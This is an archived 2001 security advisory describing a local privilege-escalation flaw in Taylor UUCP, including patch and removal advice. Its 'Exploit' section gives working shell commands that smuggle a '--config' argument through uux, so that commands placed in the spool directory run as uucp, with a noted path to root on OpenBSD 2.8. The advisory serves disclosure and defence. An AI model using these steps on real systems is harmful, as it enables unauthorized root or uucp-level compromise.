Multiple vendor 'Taylor UUCP' problems.

From: zen-parse (zen-parse@gmx.net)
Date: Sat Sep 08 2001 - 12:58:39 CEST


******************* Brief description *************

  Due to incorrect argument handling in a component of the
  Taylor UUCP package, it is possible for local users to
  gain uid/gid uucp.

  This may allow further elevation, depending on the system,
  up to and including root access.

  On OpenBSD 2.8 (and probably others) it allows root compromise.
  By overwriting the uucp owned program /usr/bin/uustat, arbitrary
  commands may be executed as part of the /etc/daily crontab script.

  On Redhat 7.0 (and probably others) it allows creation of empty
  files as root, and the ability to execute commands as if logged
  in at the console (as checked via /lib/security/pam_console.so).
  This may also allow further elevation of privileges, or denial of
  service. (Tested against uucp-1.06.1-25)

  Other systems running this package are also affected to
  a greater or lesser degree.

*********************** Solution ******************

Patches should be available very soon, if not already, for most
affected systems.

If you do not require uucp functionality, you should remove the
uucp packages from your system.

********************** The Programs ***************

uux (1) - Remote command execution over UUCP
  If you specify an alternative configuration, it will run as the user
  that called it, and pass the same configuration to uuxqt.

uuxqt (1) - UUCP execution daemon
  Defaults to allowing rmail and uucp to be run, and nothing else,
  unless the configuration it is invoked with allows it to run other
  commands.

uucp (1) - Unix to Unix copy
  If you specify an alternate configuration, it will also run as the user
  that called it.

  uuxqt checks the arguments for the programs it is asked to execute
  and gets rid of what it thinks are the potentially dangerous ones.
  However, it does not remove long arguments.

******************** The Exploit ******************

uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will execute uucp, but will not use the /tmp/vv.v configuration file.

However,

uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will use the supplied configuration, without dropping privileges.

1) Make a configuration file that allows any command to be executed, and
   allows files from anywhere to be copied to anywhere that is writable
   by uid/gid uucp. ( /tmp/config.uucp )
2) Make a command file with the command you want to be executed.
   ( /tmp/commands.uucp )
3) Do something like the following:

$ THISHOST=`uuname -l`
$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}

The commands in /tmp/commands.uucp file will be executed by uuxqt, with
the uid/gid of uucp.

If you want to perform an exploit, and don't know what to put in the
files, you should read the documentation for uucp.

(Proof of concept root exploit for OpenBSD was performed on the wargame
running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )

-- zen-parse

===========================================================================
    http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
     'gone platinum' = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
                        = and %73%6f%75%6e%64%73%20%6f%6b
===========================================================================

-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.



This archive was generated by hypermail 2.1.2 : Wed Sep 19 2001 - 17:53:26 CEST